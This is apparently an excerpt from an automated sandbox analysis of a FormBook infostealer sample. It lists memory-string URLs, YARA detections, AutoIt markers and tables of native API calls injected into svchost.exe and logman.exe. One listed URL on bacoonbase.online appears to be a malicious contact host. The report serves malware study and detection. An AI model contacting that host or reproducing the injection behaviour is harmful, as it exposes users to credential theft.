Source: logman.exe, 00000006.00000003.2448023899.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: logman.exe, 00000006.00000002.2944473496.0000000003C74000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000036A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2563084436.0000000016854000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.bacoonbase.online/tbkw/?6v=eEnz25iqeyYaF0GZTcv88p8ZheMBIwFv/cURASnuQ31RxRodHZdUyBKgSTxpQ
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2943713333.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943777729.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248443775.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2945365410.00000000056F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247956457.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2942688422.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: YKzxWyqI6Y.exe, 00000000.00000000.1693528352.00000000002B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1900e4ec-6
Source: YKzxWyqI6Y.exe, 00000000.00000000.1693528352.00000000002B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_9c937a3f-7
Source: YKzxWyqI6Y.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_342916e1-9
Source: YKzxWyqI6Y.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_1fc887b4-2

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042CF23 NtClose,	1_2_0042CF23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040ACB3 NtDelayExecution,	1_2_0040ACB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	1_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72B60 NtClose,LdrInitializeThunk,	1_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B74340 NtSetContextThread,	1_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73090 NtSetValueKey,	1_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73010 NtOpenDirectoryObject,	1_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B74650 NtSuspendThread,	1_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BA0 NtEnumerateValueKey,	1_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72B80 NtQueryInformationFile,	1_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BF0 NtAllocateVirtualMemory,	1_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BE0 NtQueryValueKey,	1_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AB0 NtWaitForSingleObject,	1_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AF0 NtWriteFile,	1_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AD0 NtReadFile,	1_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B739B0 NtGetContextThread,	1_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FB0 NtResumeThread,	1_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FA0 NtQuerySection,	1_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F90 NtProtectVirtualMemory,	1_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FE0 NtCreateFile,	1_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F30 NtCreateSection,	1_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F60 NtCreateProcessEx,	1_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72EA0 NtAdjustPrivilegesToken,	1_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72E80 NtReadVirtualMemory,	1_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72EE0 NtQueueApcThread,	1_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72E30 NtWriteVirtualMemory,	1_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DB0 NtEnumerateKey,	1_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DD0 NtDelayExecution,	1_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D30 NtUnmapViewOfSection,	1_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D10 NtMapViewOfSection,	1_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73D10 NtOpenProcessToken,	1_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D00 NtSetInformationFile,	1_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73D70 NtOpenThread,	1_2_03B73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CA0 NtQueryInformationToken,	1_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CF0 NtOpenProcess,	1_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CC0 NtQueryVirtualMemory,	1_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C00 NtQueryInformationProcess,	1_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C70 NtFreeVirtualMemory,	1_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C60 NtCreateKey,	1_2_03B72C60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D4340 NtSetContextThread,LdrInitializeThunk,	6_2_032D4340
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D4650 NtSuspendThread,LdrInitializeThunk,	6_2_032D4650
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D35C0 NtCreateMutant,LdrInitializeThunk,	6_2_032D35C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2B60 NtClose,LdrInitializeThunk,	6_2_032D2B60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_032D2BA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_032D2BE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_032D2BF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2AF0 NtWriteFile,LdrInitializeThunk,	6_2_032D2AF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2AD0 NtReadFile,LdrInitializeThunk,	6_2_032D2AD0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D39B0 NtGetContextThread,LdrInitializeThunk,	6_2_032D39B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2F30 NtCreateSection,LdrInitializeThunk,	6_2_032D2F30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2FB0 NtResumeThread,LdrInitializeThunk,	6_2_032D2FB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2FE0 NtCreateFile,LdrInitializeThunk,	6_2_032D2FE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_032D2E80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_032D2EE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_032D2D30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_032D2D10
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_032D2DF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_032D2DD0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2C60 NtCreateKey,LdrInitializeThunk,	6_2_032D2C60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_032D2C70
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_032D2CA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D3010 NtOpenDirectoryObject,	6_2_032D3010
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D3090 NtSetValueKey,	6_2_032D3090
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2B80 NtQueryInformationFile,	6_2_032D2B80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2AB0 NtWaitForSingleObject,	6_2_032D2AB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2F60 NtCreateProcessEx,	6_2_032D2F60
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2FA0 NtQuerySection,	6_2_032D2FA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2F90 NtProtectVirtualMemory,	6_2_032D2F90
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2E30 NtWriteVirtualMemory,	6_2_032D2E30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2EA0 NtAdjustPrivilegesToken,	6_2_032D2EA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2D00 NtSetInformationFile,	6_2_032D2D00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D3D10 NtOpenProcessToken,	6_2_032D3D10
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D3D70 NtOpenThread,	6_2_032D3D70
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2DB0 NtEnumerateKey,	6_2_032D2DB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2C00 NtQueryInformationProcess,	6_2_032D2C00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2CF0 NtOpenProcess,	6_2_032D2CF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_032D2CC0 NtQueryVirtualMemory,	6_2_032D2CC0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A99A10 NtReadFile,	6_2_02A99A10
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A99BA0 NtClose,	6_2_02A99BA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A99B00 NtDeleteFile,	6_2_02A99B00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A998A0 NtCreateFile,	6_2_02A998A0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 6_2_02A99D00 NtAllocateVirtualMemory,	6_2_02A99D00

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418E83	1_2_00418E83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041707E	1_2_0041707E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004010F8	1_2_004010F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417083	1_2_00417083
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410893	1_2_00410893
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E893	1_2_0040E893
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401100	1_2_00401100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403100	1_2_00403100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E9D7	1_2_0040E9D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E9E3	1_2_0040E9E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004012A0	1_2_004012A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401C03	1_2_00401C03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F543	1_2_0042F543
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402500	1_2_00402500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041066A	1_2_0041066A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410673	1_2_00410673
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B8739A	1_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C003E6	1_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF132D	1_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA352	1_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D34C	1_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D2F0	1_2_03B5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4B1B0	1_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C001AA	1_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF81CC	1_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B16B	1_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30100	1_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7516C	1_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC8158	1_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF70E9	1_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF0E0	1_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF0CC	1_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF7B0	1_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3C7C0	1_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64750	1_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5C6E0	1_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDD5B0	1_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C00591	1_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7571	1_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEE4F6	1_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF43F	1_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B31460	1_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF2446	1_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5FB80	1_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB5BF0	1_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7DBF9	1_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF6BD7	1_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFB76	1_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFAB40	1_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDDAAC	1_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B85AA0	1_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEDAC6	1_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB3A6C	1_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFA49	1_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7A46	1_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0A9A6	1_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B49950	1_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B950	1_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B268B8	1_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E8F0	1_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B438E0	1_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAD800	1_2_03BAD800
